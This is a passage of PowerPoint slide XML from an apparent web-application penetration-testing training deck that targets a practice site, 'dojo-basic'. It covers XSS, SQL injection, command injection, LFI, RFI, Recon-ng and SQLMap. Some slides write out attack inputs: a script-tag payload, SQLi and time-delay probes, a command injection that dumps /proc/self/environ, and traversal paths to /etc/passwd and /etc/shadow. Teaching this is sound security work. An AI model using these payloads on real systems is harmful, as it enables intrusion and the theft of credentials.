            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>‘/&gt;&lt;script&gt;alert(“XSS Element Test”)&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2380409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723420D-7F84-104E-8330-854FCED78AA0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="120422" y="1181366"/>
            <a:ext cx="4387742" cy="3291780"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Content Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{61775523-CF8D-8447-9202-DF3A602BC765}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect r="11905"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4572000" y="1181366"/>
            <a:ext cx="4451578" cy="3291780"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ECACADA6-CCAD-B74F-A0E7-46C1544EF2AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3705966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4232-723C-1E44-AEAB-2DC6F171FF01}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SQL Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D25937E7-4F52-B847-9D6F-F24D807A38E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Inject SQL statements into database queries to exfiltrate data, modify data, insert data, delete data, upload files or shells.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>More information can be found:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>www.owasp.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>index.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>SQL_Injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://www.websec.ca/kb/sql_injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Non-blind SQL injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Unsanitized</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> input, lack of prepared statements</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Blind SQL injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Data isn’t directly revealed. Inferred by timing, error pages, HTTP responses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Out-of-band SQL injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Relies on the database servers ability to make DNS or HTTP requests to deliver data.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="374974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46F0-808C-F645-9F26-135C1272F0F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Recon-ng OSINT</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{100BC71E-B598-FD45-853B-C3A59F5AEBAA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t># recon-ng</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>List modules that can be installed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[recon-ng][default] &gt; marketplace search</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-285750"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Install module</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[recon-ng][default] &gt; marketplace install </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>whois_pocs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Load module</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[recon-ng][default] &gt; modules load </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>whois_pocs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Get information about module</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[recon-ng][default][</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>whois_pocs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>] &gt; info</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3996424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D66D-8CA7-F540-85DA-805F1FAE0A65}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SQL Injection Examples</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E1C8206-03FF-814F-86DC-B00E775B5043}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>See if input is sanitized</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Input a single quote</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>True/False checks append to input string</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Test’ and 1=1 --validate if something gets returned</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Test’ and 1=2 -- validate nothing gets returned</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Time based</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>test';</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>waitfor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> delay '0:0:10’ – see if query returns in 10 seconds</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use error messages returned to help craft your SQL injection or get the correct number of columns for unions.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2065584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0E24-2145-BB49-B252-A0BFC723CC07}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Command Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CAD1DC7A-A6CA-F449-9B2F-0C838B196733}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Inject OS commands from web application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>View directory contents</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>target_host</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>google.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>; ls –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>alR</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>View application user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>target_host</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>google.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>whoami</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Dump env variables</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>target_host</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>google.com;cat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> /proc/self/environ</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1874323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A5F2F55-727C-F64C-BCE3-5C7244C49CC6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4553877" y="1631511"/>
            <a:ext cx="4433182" cy="2510200"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA10C675-3626-4748-915C-B7F96AA828D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0"/>
              <a:t>Command Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Content Placeholder 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F0991A55-F297-2C43-BB0F-7FDA6300EA32}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="156941" y="1656911"/>
            <a:ext cx="4284766" cy="2510200"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1631485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59C2-C73E-9144-84D9-3402658D1693}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Local File Inclusion LFI</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{31ABDEA7-EA61-3549-B3AC-DB2BB277B31E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The ability to include local files to use in attacks or to gather system information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>List users and password hashes in Linux</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>http://dojo-basic/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>index.php?page</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=../../../../../../../</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/passwd</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Get user password hashes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>http://dojo-basic/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>index.php?page</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=../../../../../../../</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/shadow</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3918934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1C07-9843-574B-8BF5-8A64FF2E5156}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Remote File Inclusion RFI</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F607EEFE-E124-E448-B3DA-CADAA1F51301}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Execute files from a remote system within the application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>http://dojo-basic/index.php?text_file_name=https://www.google.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Look for URLs that are loading pages: page=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>contactus.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Look for URLs that use full http requests: page=http://dojo-basic/services/login</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can possibly be used to upload remote shells to the server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25228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5737-5DB0-554D-AFBC-18C7F305C219}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>SQLMap</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3CBA0B51-4499-BF43-B386-168274C0057C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Automates testing for SQL injections within applications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Run through proxy to learn how to better test for SQL Injections</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -u 'http://dojo-basic:80/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>index.php?page</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
